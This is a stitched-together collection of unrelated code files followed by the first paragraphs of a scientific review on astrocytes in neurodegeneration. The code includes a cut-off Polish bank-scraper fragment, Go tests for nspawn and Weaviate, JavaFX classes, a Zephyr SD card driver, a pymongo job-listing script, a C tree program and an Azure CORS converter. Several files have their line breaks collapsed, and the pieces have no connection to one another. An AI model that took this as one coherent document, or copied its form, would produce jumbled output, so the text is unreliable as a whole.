adresowej.".format(name)) except TimeoutException: LOG.error(u"Upłynął czas oczekiwania: nie odnaleziono jakiegoś elementu na stronie mbank :/") raise return ok
import numpy as np


def cut_equal_yz(im_1, im_2):
    """Crop two 3-D images to their common (y, z) extent."""
    shape_1 = im_1.shape
    shape_2 = im_2.shape
    min_y = np.min([shape_1[1], shape_2[1]])
    min_z = np.min([shape_1[2], shape_2[2]])
    im_1 = im_1[:, :min_y, :min_z].copy()
    im_2 = im_2[:, :min_y, :min_z].copy()
    return im_1, im_2
def move_individual(destination_rank, destination_index, source_rank, source_index): individual = source_rank.individuals[source_index] destination_rank.individuals[destination_index] = individual destination_rank = destination_rank._replace( occupancy=destination_rank.occupancy + 1) source_rank.individuals[source_index] = individual._replace( valid=False) source_rank = source_rank._replace( occupancy=source_rank.occupancy - 1) return destination_rank, source_rank
/** * Launches a quest * @param q is the Quest to be launched */ public void startQuest(Quest q) { Platform.runLater(() -> { ui.getChildren().add(q.getQuestPane()); if(q.getInstr() != null) { q.getHelpMenu().setInstr(q.getInstr()); } }); q.start(); }
import 'reflect-metadata';
import { config } from "dotenv";
import app from "./bootstrap/app";

// Load environment variables from .env before reading process.env
config();

const port = process.env.PORT || 3000;

(async () => {
  app.listen(port, () => {
    console.log(`app is listening on port ${port}`);
  });
  process.on("unhandledRejection", (reason, p) => {
    console.error("Unhandled Rejection at:", p, "reason:", reason);
  });
})();
package nspawn import ( "strings" "testing" ) func TestVersion(t *testing.T) { n := Nspawn{} v, err := n.Version() if err != nil { t.Fatalf("failed to get nspawn version: %s", err) } if v < 200 { t.Errorf("version expected to be recent, but is ancient: %d", v) } } func TestMachines(t *testing.T) { m, err := MachinesAvailable() if err != nil { t.Fatal(err) } t.Logf("found %q", m) } func TestSetEnv(t *testing.T) { e := "FARTS=true" c, err := NewContainer("/home/containers/debian-jessie/") if err != nil { t.Fatal(err) } c.Env = append(c.Env, e) c.Quiet = true cmd := c.Cmd("/bin/cat", "/proc/self/environ") t.Logf("Path %q", cmd.Path) t.Logf("Args %q \n (%q)", cmd.Args, strings.Join(cmd.Args, " ")) output, err := cmd.CombinedOutput() if err != nil { t.Error(err) } found := false for _, environ := range strings.Split(string(output), "\x00") { if environ == e { found = true } } if !found { t.Errorf("expected to find %q; got %q", e, string(output)) } }
<filename>src/main/java/test/tiempo/test/RejozOriginal.java package main.java.test.tiempo.test; import javafx.application.Application; import javafx.application.Platform; import javafx.scene.Scene; import javafx.scene.layout.BorderPane; import javafx.scene.text.Text; import javafx.stage.Stage; import javafx.stage.StageStyle; import main.java.utils.Time; import java.text.SimpleDateFormat; import java.time.*; import java.util.Date; import static main.java.test.TestTiempo.ZONE_GTM; public class RejozOriginal extends Application { // we are allowed to create UI objects on non-UI thread private final Text txtTime = new Text(); private volatile boolean enough = false; private static final ZoneId ZONE_UTC = ZoneOffset.UTC; // this is timer thread which will update out time view every second Thread timer = new Thread(() -> { SimpleDateFormat dt = new SimpleDateFormat("hh:mm:ss"); while (!enough) { try { // running "long" operation not on UI thread Thread.sleep(100); } catch (InterruptedException ex) { } //final String time = dt.format(new Date()); Platform.runLater(() -> { // updating live UI object requires JavaFX App Thread //txtTime.setText(time); txtTime.setText(LocalDateTime.now(ZONE_UTC).toString()); System.out.println(changeZone(LocalDateTime.now(ZONE_UTC)).toString()); }); } }); @Override public void start(Stage stage) { // Layout Manager BorderPane root = new BorderPane(); root.setCenter(txtTime); // creating a scene and configuring the stage Scene scene = new Scene(root, 200, 150); stage.initStyle(StageStyle.UTILITY); stage.setScene(scene); timer.start(); stage.show(); } // stop() method of the Application API @Override public void stop() { // we need to stop our working thread after closing a window // or our program will not exit enough = true; } public static void main(String[] args) { launch(args); } public static LocalDateTime changeZone(LocalDateTime localDateTime) { return localDateTime.atZone(ZONE_UTC).withZoneSameInstant(ZONE_GTM).toLocalDateTime(); } }
// _ _ // __ _____ __ ___ ___ __ _| |_ ___ // \ \ /\ / / _ \/ _` \ \ / / |/ _` | __/ _ \ // \ V V / __/ (_| |\ V /| | (_| | || __/ // \_/\_/ \___|\__,_| \_/ |_|\__,_|\__\___| // // Copyright © 2016 - 2022 SeMI Technologies B.V. All rights reserved. // // CONTACT: <EMAIL> // package vectorizer import ( "context" "strings" "testing" "github.com/semi-technologies/weaviate/entities/models" "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" ) // These are mostly copy/pasted (with minimal additions) from the // text2vec-contextionary module func TestVectorizingObjects(t *testing.T) { type testCase struct { name string input *models.Object expectedClientCall string expectedPoolingStrategy string noindex string excludedProperty string // to simulate a schema where property names aren't vectorized excludedClass string // to simulate a schema where class names aren't vectorized poolingStrategy string } tests := []testCase{ { name: "empty object", input: &models.Object{ Class: "Car", }, poolingStrategy: "cls", expectedPoolingStrategy: "cls", expectedClientCall: "car", }, { name: "object with one string prop", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "Mercedes", }, }, expectedClientCall: "car brand mercedes", }, { name: "object with one non-string prop", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "power": 300, }, }, expectedClientCall: "car", }, { name: "object with a mix of props", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "car brand best brand review a very great car", }, { name: "with a noindexed property", noindex: "review", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "car brand best brand", }, { name: "with the class name not 
vectorized", excludedClass: "Car", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "brand best brand review a very great car", }, { name: "with a property name not vectorized", excludedProperty: "review", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "brand": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "car brand best brand a very great car", }, { name: "with no schema labels vectorized", excludedProperty: "review", excludedClass: "Car", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "review": "a very great car", }, }, expectedClientCall: "a very great car", }, { name: "with string/text arrays without propname or classname", excludedProperty: "reviews", excludedClass: "Car", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "reviews": []interface{}{ "a very great car", "you should consider buying one", }, }, }, expectedClientCall: "a very great car you should consider buying one", }, { name: "with string/text arrays with propname and classname", input: &models.Object{ Class: "Car", Properties: map[string]interface{}{ "reviews": []interface{}{ "a very great car", "you should consider buying one", }, }, }, expectedClientCall: "car reviews a very great car reviews you should consider buying one", }, { name: "with compound class and prop names", input: &models.Object{ Class: "SuperCar", Properties: map[string]interface{}{ "brandOfTheCar": "best brand", "power": 300, "review": "a very great car", }, }, expectedClientCall: "super car brand of the car best brand review a very great car", }, } for _, test := range tests { t.Run(test.name, func(t *testing.T) { client := &fakeClient{} v := New(client) ic := &fakeSettings{ excludedProperty: test.excludedProperty, skippedProperty: test.noindex, vectorizeClassName: test.excludedClass != "Car", 
poolingStrategy: test.poolingStrategy, } err := v.Object(context.Background(), test.input, ic) require.Nil(t, err) assert.Equal(t, models.C11yVector{0, 1, 2, 3}, test.input.Vector) expected := strings.Split(test.expectedClientCall, " ") actual := strings.Split(client.lastInput, " ") assert.Equal(t, expected, actual) assert.Equal(t, client.lastConfig.PoolingStrategy, test.expectedPoolingStrategy) }) } }
import React, {useContext} from "react"; import {AccordionContext, OverlayTrigger, Tooltip, useAccordionToggle} from "react-bootstrap"; import {MdExpandLess, MdExpandMore} from "react-icons/all"; import InteractionHandler from "../player/InteractionHandler"; import "../player/ControlButton.css"; interface QueueExpandToggleProps { eventKey: string } const QueueExpandToggle = (props: QueueExpandToggleProps) => { const currentEventKey = useContext(AccordionContext); const decoratedOnClick = useAccordionToggle(props.eventKey); const isCurrentEventKey = currentEventKey === props.eventKey; return ( <OverlayTrigger placement={"top"} overlay={ <Tooltip id={"tooltip-queue-expand"}> {isCurrentEventKey ? "Hide queue" : "Show queue"} </Tooltip> }> <div style={{display: "inline-flex"}}> <InteractionHandler className={"control-button ml-1"} onClick={(e, touch) => { decoratedOnClick(e); }}> {isCurrentEventKey ? <MdExpandLess/> : <MdExpandMore/> } </InteractionHandler> </div> </OverlayTrigger> ); }; export default QueueExpandToggle;
from dataclasses import dataclass
from xml.etree.ElementTree import Element


@dataclass
class Department:
    """A department at the university"""

    longname: str
    name: str

    @classmethod
    def from_xml(cls, elem: Element):
        """Construct a new Department from an XML element"""
        return cls(elem.get("longname"), elem.get("name"))
/* * Copyright 2022 NXP * * SPDX-License-Identifier: Apache-2.0 */ #include <zephyr/zephyr.h> #include <zephyr/drivers/sdhc.h> #include <zephyr/sd/sd.h> #include <zephyr/sd/sdmmc.h> #include <zephyr/sd/sd_spec.h> #include <zephyr/logging/log.h> #include <zephyr/sys/__assert.h> #include "sd_utils.h" #include "sdmmc_priv.h" LOG_MODULE_REGISTER(sd, CONFIG_SD_LOG_LEVEL); /* Idle all cards on bus. Can be used to clear errors on cards */ static inline int sd_idle(struct sd_card *card) { struct sdhc_command cmd = {0}; /* Reset card with CMD0 */ cmd.opcode = SD_GO_IDLE_STATE; cmd.response_type = (SD_RSP_TYPE_NONE | SD_SPI_RSP_TYPE_R1); cmd.timeout_ms = CONFIG_SD_CMD_TIMEOUT; return sdhc_request(card->sdhc, &cmd, NULL); } /* Sends CMD8 during SD initialization */ static int sd_send_interface_condition(struct sd_card *card) { struct sdhc_command cmd = {0}; int ret; uint32_t resp; cmd.opcode = SD_SEND_IF_COND; cmd.arg = SD_IF_COND_VHS_3V3 | SD_IF_COND_CHECK; cmd.response_type = (SD_RSP_TYPE_R7 | SD_SPI_RSP_TYPE_R7); cmd.timeout_ms = CONFIG_SD_CMD_TIMEOUT; ret = sdhc_request(card->sdhc, &cmd, NULL); if (ret) { LOG_DBG("SD CMD8 failed with error %d", ret); /* Retry */ return SD_RETRY; } if (card->host_props.is_spi) { resp = cmd.response[1]; } else { resp = cmd.response[0]; } if ((resp & 0xFF) != SD_IF_COND_CHECK) { LOG_INF("Legacy card detected, no CMD8 support"); /* Retry probe */ return SD_RETRY; } if ((resp & SD_IF_COND_VHS_MASK) != SD_IF_COND_VHS_3V3) { /* Card does not support 3.3V */ return -ENOTSUP; } LOG_DBG("Found SDHC with CMD8 support"); card->flags |= SD_SDHC_FLAG; return 0; } /* Sends CMD59 to enable CRC checking for SD card in SPI mode */ static int sd_enable_crc(struct sd_card *card) { struct sdhc_command cmd = {0}; /* CMD59 for CRC mode is only valid for SPI hosts */ __ASSERT_NO_MSG(card->host_props.is_spi); cmd.opcode = SD_SPI_CRC_ON_OFF; cmd.arg = 0x1; /* Enable CRC */ cmd.response_type = SD_SPI_RSP_TYPE_R1; cmd.timeout_ms = CONFIG_SD_CMD_TIMEOUT; return 
	sdhc_request(card->sdhc, &cmd, NULL);
}

/*
 * Perform init required for both SD and SDIO cards.
 * This function performs the following portions of SD initialization
 * - CMD0 (SD reset)
 * - CMD8 (SD voltage check)
 */
static int sd_common_init(struct sd_card *card)
{
	int ret;

	/* Reset card with CMD0 */
	ret = sd_idle(card);
	if (ret) {
		LOG_ERR("Card error on CMD0");
		return ret;
	}
	/* Perform voltage check using SD CMD8 */
	ret = sd_retry(sd_send_interface_condition, card, CONFIG_SD_RETRY_COUNT);
	if (ret == -ETIMEDOUT) {
		LOG_INF("Card does not support CMD8, assuming legacy card");
		return sd_idle(card);
	} else if (ret) {
		LOG_ERR("Card error on CMD8");
		return ret;
	}
	if (card->host_props.is_spi && IS_ENABLED(CONFIG_SDHC_SUPPORTS_SPI_MODE)) {
		/* Enable CRC for SPI commands using CMD59 */
		ret = sd_enable_crc(card);
	}
	return ret;
}

static int sd_init_io(struct sd_card *card)
{
	struct sdhc_io *bus_io = &card->bus_io;
	int ret;

	/* SD clock should start gated */
	bus_io->clock = 0;
	/* SPI requires SDHC push-pull, and open drain buses use more power */
	bus_io->bus_mode = SDHC_BUSMODE_PUSHPULL;
	bus_io->power_mode = SDHC_POWER_ON;
	bus_io->bus_width = SDHC_BUS_WIDTH1BIT;
	/* Cards start with legacy timing and 3.3V signalling at power on */
	bus_io->timing = SDHC_TIMING_LEGACY;
	bus_io->signal_voltage = SD_VOL_3_3_V;

	/* Toggle power to card to reset it */
	LOG_DBG("Resetting power to card");
	bus_io->power_mode = SDHC_POWER_OFF;
	ret = sdhc_set_io(card->sdhc, bus_io);
	if (ret) {
		LOG_ERR("Could not disable card power via SDHC");
		return ret;
	}
	sd_delay(card->host_props.power_delay);
	bus_io->power_mode = SDHC_POWER_ON;
	ret = sdhc_set_io(card->sdhc, bus_io);
	if (ret) {
		LOG_ERR("Could not enable card power via SDHC");
		return ret;
	}
	/* After reset or init, card voltage should be 3.3V */
	card->card_voltage = SD_VOL_3_3_V;
	/* Reset card flags */
	card->flags = 0U;
	/* Delay so card can power up */
	sd_delay(card->host_props.power_delay);
	/* Start bus clock */
	bus_io->clock = SDMMC_CLOCK_400KHZ;
	ret = sdhc_set_io(card->sdhc, bus_io);
	if (ret) {
		LOG_ERR("Could not start bus clock");
		return ret;
	}
	return 0;
}

/*
 * Sends CMD5 to SD card, and uses response to determine if card
 * is SDIO or SDMMC card. Return 0 if SDIO card, positive value if not, or
 * negative errno on error
 */
int sd_test_sdio(struct sd_card *card)
{
	struct sdhc_command cmd = {0};
	int ret;

	cmd.opcode = SDIO_SEND_OP_COND;
	cmd.arg = 0;
	cmd.response_type = (SD_RSP_TYPE_R4 | SD_SPI_RSP_TYPE_R4);
	cmd.timeout_ms = CONFIG_SD_CMD_TIMEOUT;

	ret = sdhc_request(card->sdhc, &cmd, NULL);
	if (ret) {
		/*
		 * We are just probing the card; it is likely an SD memory
		 * card, so report that it is not SDIO.
		 */
		card->type = CARD_SDMMC;
		return SD_NOT_SDIO;
	}
	/* Check the number of I/O functions */
	card->num_io = ((cmd.response[0] & SDIO_OCR_IO_NUMBER) >> SDIO_OCR_IO_NUMBER_SHIFT);
	if ((card->num_io == 0) || ((cmd.response[0] & SDIO_IO_OCR_MASK) == 0)) {
		if (cmd.response[0] & SDIO_OCR_MEM_PRESENT_FLAG) {
			/* Card is not an SDIO card. */
			card->type = CARD_SDMMC;
			return SD_NOT_SDIO;
		}
		/* Card is not a valid SD device. We do not support it */
		return -ENOTSUP;
	}
	/*
	 * Since we got a valid OCR response,
	 * we know this card is an SDIO card.
	 */
	card->type = CARD_SDIO;
	return 0;
}

/*
 * Check SD card type
 * Uses SDIO OCR response to determine what type of card is present.
 */
static int sd_check_card_type(struct sd_card *card)
{
	int ret;

	/* Test if the card responds to CMD5 (only SDIO cards will) */
	/* Note that CMD5 can take many retries */
	ret = sd_test_sdio(card);
	if ((ret == SD_NOT_SDIO) && card->type == CARD_SDMMC) {
		LOG_INF("Detected SD card");
		return 0;
	} else if ((ret == 0) && card->type == CARD_SDIO) {
		LOG_INF("Detected SDIO card");
		return 0;
	}
	LOG_ERR("No usable card type was found");
	return -ENOTSUP;
}

/*
 * Performs init flow described in section 3.6 of SD specification.
 */
static int sd_command_init(struct sd_card *card)
{
	int ret;

	/*
	 * We must wait 74 clock cycles, per SD spec, to use card after power
	 * on. At 400 kHz, this is a 185us delay. Wait 1ms to be safe.
	 */
	sd_delay(1);
	/*
	 * Start card initialization and identification
	 * flow described in section 3.6 of SD specification
	 */
	ret = sd_common_init(card);
	if (ret) {
		return ret;
	}
	/* Use CMD5 to determine card type */
	ret = sd_check_card_type(card);
	if (ret) {
		LOG_ERR("Unusable card");
		return -ENOTSUP;
	}
	if (card->type == CARD_SDMMC) {
		/*
		 * Reset the card first - the CMD5 sent to check for SDIO
		 * may have left it in an error state
		 */
		ret = sd_common_init(card);
		if (ret) {
			LOG_ERR("Init after CMD5 failed");
			return ret;
		}
		/* Perform memory card initialization */
		ret = sdmmc_card_init(card);
	} else if (card->type == CARD_SDIO) {
		LOG_ERR("SDIO cards not currently supported");
		return -ENOTSUP;
	}
	if (ret) {
		LOG_ERR("Card init failed");
		return ret;
	}
	return 0;
}

/* Initializes SD/SDIO card */
int sd_init(const struct device *sdhc_dev, struct sd_card *card)
{
	int ret;

	if (!sdhc_dev) {
		return -ENODEV;
	}
	card->sdhc = sdhc_dev;
	ret = sdhc_get_host_props(card->sdhc, &card->host_props);
	if (ret) {
		LOG_ERR("SD host controller returned invalid properties");
		return ret;
	}
	/* Init and lock card mutex */
	ret = k_mutex_init(&card->lock);
	if (ret) {
		LOG_DBG("Could not init card mutex");
		return ret;
	}
	ret = k_mutex_lock(&card->lock, K_MSEC(CONFIG_SD_INIT_TIMEOUT));
	if (ret) {
		LOG_ERR("Timeout while trying to acquire card mutex");
		return ret;
	}
	/* Initialize SDHC IO with defaults */
	ret = sd_init_io(card);
	if (ret) {
		k_mutex_unlock(&card->lock);
		return ret;
	}
	/*
	 * SD protocol is stateful, so we must account for the possibility
	 * that the card is in a bad state. The return code SD_RESTART
	 * indicates that the initialization left the card in a bad state.
	 * In this case the subsystem takes the following steps:
	 * - set card status to error
	 * - re-init host I/O (will also toggle power to the SD card)
	 * - retry initialization once more
	 * If initialization then fails, the sd_init routine will assume the
	 * card is inaccessible
	 */
	ret = sd_command_init(card);
	if (ret == SD_RESTART) {
		/* Reset I/O, and retry SD initialization once more */
		card->status = CARD_ERROR;
		/* Reset I/O to default */
		ret = sd_init_io(card);
		if (ret) {
			LOG_ERR("Failed to reset SDHC I/O");
			k_mutex_unlock(&card->lock);
			return ret;
		}
		ret = sd_command_init(card);
		if (ret) {
			LOG_ERR("Failed to init SD card after I/O reset");
			k_mutex_unlock(&card->lock);
			return ret;
		}
	} else if (ret != 0) {
		/* Initialization failed */
		k_mutex_unlock(&card->lock);
		card->status = CARD_ERROR;
		return ret;
	}
	/* Card initialization succeeded. */
	card->status = CARD_INITIALIZED;
	/* Unlock card mutex */
	ret = k_mutex_unlock(&card->lock);
	if (ret) {
		LOG_DBG("Could not unlock card mutex");
		return ret;
	}
	return ret;
}

/* Return true if card is present, false otherwise */
bool sd_is_card_present(const struct device *sdhc_dev)
{
	if (!sdhc_dev) {
		return false;
	}
	return sdhc_card_present(sdhc_dev) == 1;
}
from pymongo import MongoClient
from pprint import pprint
from Lesson2 import hh

client = MongoClient('127.0.0.1', 27017)
db = client['jobs_database']
jobs_data = db.jobs_data

# dicts = hh('C++', 1)
# jobs_data.insert_many(dicts)

# for job in jobs_data.find({}):
#     pprint(job)


def find_min_salary(min_salary):
    # Match jobs whose lower OR upper salary bound is at least min_salary.
    # Note each condition must be its own sub-document inside '$or';
    # combining them in one sub-document would AND them instead.
    query = {'$or': [{'salary_min': {'$gte': min_salary}},
                     {'salary_max': {'$gte': min_salary}}]}
    for job in jobs_data.find(query):
        pprint(job)


def new_jobs_to_db(jobs):
    # Insert only jobs whose link is not already in the collection
    count = 0
    for job in jobs:
        if jobs_data.count_documents({'link': job['link']}) == 0:
            jobs_data.insert_one(job)
            count += 1
    print(f"{count} new jobs added to the database")


find_min_salary(100000)
new_jobs_to_db(hh('html', 1))
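In `find_min_salary`, the intent is to match a job when either salary bound clears the threshold. With MongoDB's `$or`, each condition must be its own sub-document in the array; putting both fields in one sub-document ANDs them instead. A plain-Python sketch of the intended predicate (no MongoDB connection required; `matches_min_salary` is an illustrative helper, not part of the script above):

```python
def matches_min_salary(job, min_salary):
    """Mirror of the Mongo filter
    {'$or': [{'salary_min': {'$gte': m}}, {'salary_max': {'$gte': m}}]}:
    a job matches if either bound is present and at least min_salary."""
    for field in ('salary_min', 'salary_max'):
        value = job.get(field)
        if value is not None and value >= min_salary:
            return True
    return False


jobs = [
    {'link': 'a', 'salary_min': 50000, 'salary_max': 120000},
    {'link': 'b', 'salary_min': 30000, 'salary_max': 60000},
    {'link': 'c', 'salary_min': None, 'salary_max': None},
]
print([j['link'] for j in jobs if matches_min_salary(j, 100000)])  # ['a']
```

An `$or` query with two separate sub-documents evaluates the same predicate server-side.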
package goshare

/* DelKey deletes the value for a given key, returns status. */
func DelKey(key string) bool {
	return tsds.DelKey(key)
}

/* DelKeyNS deletes the given key's namespace and all its values, returns status. */
func DelKeyNS(key string) bool {
	return tsds.DeleteNSRecursive(key)
}

/*
DelKeyTSDS deletes all keys under the given namespace, same as DelKeyNS,
since here a TimeSeries is a NameSpace.
*/
func DelKeyTSDS(key string) bool {
	return tsds.DeleteTSDS(key)
}

/* DeleteFuncByKeyType calls a delete action for a key based on task-type. */
func DeleteFuncByKeyType(keyType string) FunkAxnParamKey {
	switch keyType {
	case "tsds":
		return DelKeyTSDS
	case "ns":
		return DelKeyNS
	default:
		return DelKey
	}
}

/* DeleteFromPacket can handle multi-key delete actions; it acts on packet data. */
func DeleteFromPacket(packet Packet) bool {
	status := true
	axnFunk := DeleteFuncByKeyType(packet.KeyType)
	for _, _key := range packet.KeyList {
		status = status && axnFunk(_key)
	}
	return status
}
import React from 'react'
import '@testing-library/jest-dom/extend-expect'
import { render, RenderResult } from '@testing-library/react'

import { CodeBlock } from '.'

describe('CodeBlock', () => {
  let wrapper: RenderResult

  describe('with required props', () => {
    beforeEach(() => {
      wrapper = render(
        <CodeBlock filename="Example Filename" language="js">
          {`function helloWorld () {
  return 'Hello, World!'
}`}
        </CodeBlock>
      )
    })

    it('renders the filename', () => {
      expect(wrapper.getByTestId('codeblock-filename')).toHaveTextContent(
        'Example Filename'
      )
    })
  })
})
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    int izq, der, value, vmostizq, vmostder, hijos[2], nhijos;
    double average;
} NODO;

NODO arbol[200002];
int root;

/* Fill in the left-most and right-most values of every subtree. */
void getmostValues(int node)
{
    if (node == -1)
        return;
    getmostValues(arbol[node].izq);
    getmostValues(arbol[node].der);
    if (arbol[node].izq == -1) {
        arbol[node].vmostizq = arbol[node].vmostder = arbol[node].value;
    } else {
        arbol[node].vmostizq = arbol[arbol[node].izq].vmostizq;
        arbol[node].vmostder = arbol[arbol[node].der].vmostder;
    }
}

/* Compute each node's average from the values accumulated on the
 * path from the root. */
void procesa(int node, int count, long long values)
{
    if (node == -1)
        return;
    if (count > 0)
        arbol[node].average = (double)values / (double)count;
    if (arbol[node].izq != -1)
        procesa(arbol[node].izq, count + 1,
                values + (long long)arbol[arbol[node].der].vmostizq);
    if (arbol[node].der != -1)
        procesa(arbol[node].der, count + 1,
                values + (long long)arbol[arbol[node].izq].vmostder);
}

int posArray[100002];

/* qsort comparator: order node indices by their stored value. */
int compare(const void *a, const void *b)
{
    return arbol[*(const int *)a].value - arbol[*(const int *)b].value;
}

int main(void)
{
    int x, y, npos, padre, value, k, izq, der, media, n, res;

    scanf("%d", &n);
    for (x = 1; x <= n; x++) {
        arbol[x].izq = -1;
        arbol[x].der = -1;
        arbol[x].nhijos = 0;
    }
    for (x = 1; x <= n; x++) {
        scanf("%d %d", &padre, &value);
        arbol[x].value = value;
        if (padre == -1)
            root = x;
        else
            arbol[padre].hijos[arbol[padre].nhijos++] = x;
    }
    for (x = 1; x <= n; x++) {
        for (y = 0; y < arbol[x].nhijos; y++) {
            if (arbol[x].value < arbol[arbol[x].hijos[y]].value)
                arbol[x].der = arbol[x].hijos[y];
            else
                arbol[x].izq = arbol[x].hijos[y];
        }
    }

    getmostValues(root);
    procesa(root, 0, 0);

    npos = 0;
    for (x = 1; x <= n; x++)
        posArray[npos++] = x;
    qsort(posArray, npos, sizeof(int), compare);

    scanf("%d", &k);
    for (x = 0; x < k; x++) {
        scanf("%d", &value);
        /* binary search for the right-most node with value < query */
        izq = 0;
        der = npos - 1;
        res = 0;
        while (izq <= der) {
            media = (izq + der) / 2;
            if (value > arbol[posArray[media]].value) {
                izq = media + 1;
                res = media;
            } else {
                der = media - 1;
            }
        }
        while (arbol[posArray[res]].izq != -1)
            res++;
        printf("%.10lf\n", arbol[posArray[res]].average);
    }
    return 0;
}
def _get_ground_template(self, width_estimate, stretch_height=1):
    if 'ground_template' not in self._cache:
        filename = 'ground_%s.yaml' % self.params['ground/template']
        path = os.path.join(os.path.dirname(__file__), 'assets', filename)
        if not os.path.isfile(path):
            return None
        # use safe_load and close the file handle explicitly
        with open(path) as fobj:
            self._cache['ground_template'] = np.array(yaml.safe_load(fobj))

    t_points = self._cache['ground_template'].copy()
    t_points *= width_estimate
    t_points[:, 1] *= stretch_height

    width_fraction = self.params['ground/template_width_fraction']
    margin_vert = int(self.params['ground/template_margin'])
    t_width = int(np.ceil(width_fraction * width_estimate))
    width_crop = (width_estimate - t_width) / 2
    t_points[:, 0] -= width_crop
    t_points = np.array([p for p in t_points if 0 < p[0] < t_width])
    t_points[:, 1] += margin_vert - t_points[:, 1].min()
    t_height = int(np.ceil(t_points[:, 1].max())) + margin_vert

    t_points = t_points.tolist()
    t_points.append((t_width, margin_vert))
    t_points.append((t_width, t_height))
    t_points.append((0, t_height))
    t_points.append((0, margin_vert))

    template = np.zeros((t_height, t_width), np.uint8)
    cv2.fillPoly(template, [np.array(t_points, np.int32)], 255)

    return template, t_points[:-4]
// AssignPropertiesFromCorsRule populates our CorsRule from the provided source CorsRule
func (rule *CorsRule) AssignPropertiesFromCorsRule(source *v1alpha1api20210401storage.CorsRule) error {
	// AllowedHeaders
	rule.AllowedHeaders = genruntime.CloneSliceOfString(source.AllowedHeaders)

	// AllowedMethods: convert each string into the typed enum
	if source.AllowedMethods != nil {
		allowedMethodList := make([]CorsRuleAllowedMethods, len(source.AllowedMethods))
		for allowedMethodIndex, allowedMethodItem := range source.AllowedMethods {
			allowedMethodItem := allowedMethodItem // pin the loop variable
			allowedMethodList[allowedMethodIndex] = CorsRuleAllowedMethods(allowedMethodItem)
		}
		rule.AllowedMethods = allowedMethodList
	} else {
		rule.AllowedMethods = nil
	}

	// AllowedOrigins
	rule.AllowedOrigins = genruntime.CloneSliceOfString(source.AllowedOrigins)

	// ExposedHeaders
	rule.ExposedHeaders = genruntime.CloneSliceOfString(source.ExposedHeaders)

	// MaxAgeInSeconds
	rule.MaxAgeInSeconds = genruntime.ClonePointerToInt(source.MaxAgeInSeconds)

	// No error is possible for these simple clones
	return nil
}
/**
 * Checks whether an Atom object conforms to the name and alternative
 * location of the first atom as set by the user.
 * @param atom
 *        - Atom object
 * @return {@code TRUE} if the atom corresponds to the first atom identifier
 *         as set by the user, {@code FALSE} otherwise.
 */
private static boolean isAtomRelevant1(final Atom atom) {
    final String atomType = CrossLinkParameter.getParameter(Parameter.ATOM_TYPE1);
    if (atomType.equals("")) {
        return true;
    }
    return atomType.contains("#" + atom.getName().trim() + "#")
        && CrossLinkParameter.getParameter(Parameter.ALTERNATIVE_LOCATION1)
                             .contains(Character.toString(atom.getAlternativeLocation()));
}
//
//  ChatSystem.h
//  AFNetworking
//
//  Created by lijunlin on 2019/8/27.
//

#import <Foundation/Foundation.h>

#define ACTION_UPDATE_DONOTHING  0
#define ACTION_UPDATE_ONESESSION 1
#define ACTION_UPDATE_ALLSESSION 2

NS_ASSUME_NONNULL_BEGIN

@interface ChatSystem : NSObject

// System action
@property(nonatomic, assign) NSInteger sysAction;
// Title
@property(nonatomic, copy) NSString *sysTitle;
// Body text
@property(nonatomic, copy) NSString *sysBody;
// Payload data
@property(nonatomic, copy) NSString *sysData;
// System timestamp
@property(nonatomic, copy) NSString *sysTime;

@end

NS_ASSUME_NONNULL_END
Dysfunctional glia: contributors to neurodegenerative disorders Astrocytes are integral components of the central nervous system, where they are involved in numerous functions critical for neuronal development and functioning, including maintenance of blood-brain barrier, formation of synapses, supporting neurons with nutrients and trophic factors, and protecting them from injury. These roles are markedly affected in the course of chronic neurodegenerative disorders, often before the onset of the disease. In this review, we summarize the recent findings supporting the hypothesis that astrocytes play a fundamental role in the processes contributing to neurodegeneration. We focus on α-synucleinopathies and tauopathies as the most common neurodegenerative diseases. The mechanisms implicated in the development and progression of these disorders appear not to be exclusively neuronal, but are often related to the astrocytic-neuronal integrity and the response of astrocytes to the altered microglial function. A profound understanding of the multifaceted functions of astrocytes and identification of their communication pathways with neurons and microglia in health and in the disease is of critical significance for the development of novel mechanism-based therapies against neurodegenerative disorders. Introduction A growing body of evidence points to the crucial importance of astrocytes and their interplay with neurons in the brain function and dysfunction. Recent studies show that these interactions are even more complex, involving a contribution of the third factor, the microglial cells. In the first part of this article, we briefly overview the role of astrocytes and microglia in the functioning of the central nervous system (CNS). Then we focus on the contribution of the astrocytic dysfunction and defective astrocyte-neuron integrity for the pathogenesis of neurodegenerative disorders, mainly Parkinson's disease (PD) and Alzheimer's disease (AD) and other tauopathies. 
Finally, we discuss the involvement of impaired modulation of astrocytes by activated microglia in the mechanisms of neurodegeneration. More specifically, we describe the metabolic, synaptic and inflammatory changes that affect microglia-astrocyte-neuron cross-talk in the course of neurodegeneration. We provide an overview of the novel insights into the key mechanisms of abnormal interactions among microglia, astrocytes and neurons that are involved in the neurodegenerative processes. Astrocyte-Neuron Interactions in the Central Nervous System Astrocytes are considered the most abundant glial cells in the CNS, where they make up 20-40% of glial cells and serve as crucial regulators of the CNS in its development and functioning (Pekny and Pekna, 2014). Additionally, astrocytes may play a critical role, either neuroprotective or neurotoxic, in virtually all disorders of the CNS. Morphologically and functionally heterogeneous populations of astrocytes are distinguished, including fibrous astrocytes, found mainly in the white matter; protoplasmic astrocytes, present mostly in the grey matter; radial glia, present in the periventricular area during brain development; perivascular astrocytes; marginal astrocytes; Müller cells in the retina; Bergmann glia in the cerebellum; and pituicytes in the neurohypophysis. Physiologically, astrocytes provide structural and metabolic support to neurons, being involved in vascular homeostasis, fluid balance and regulation of ion concentrations in the brain (Volterra and Meldolesi, 2005). Perivascular astroglia are part of the neurovascular unit, where they maintain the proper functioning of the blood-brain barrier, e.g., by regulating fluid flow through the bidirectional water channel aquaporin-4 (Bi et al., 2017).
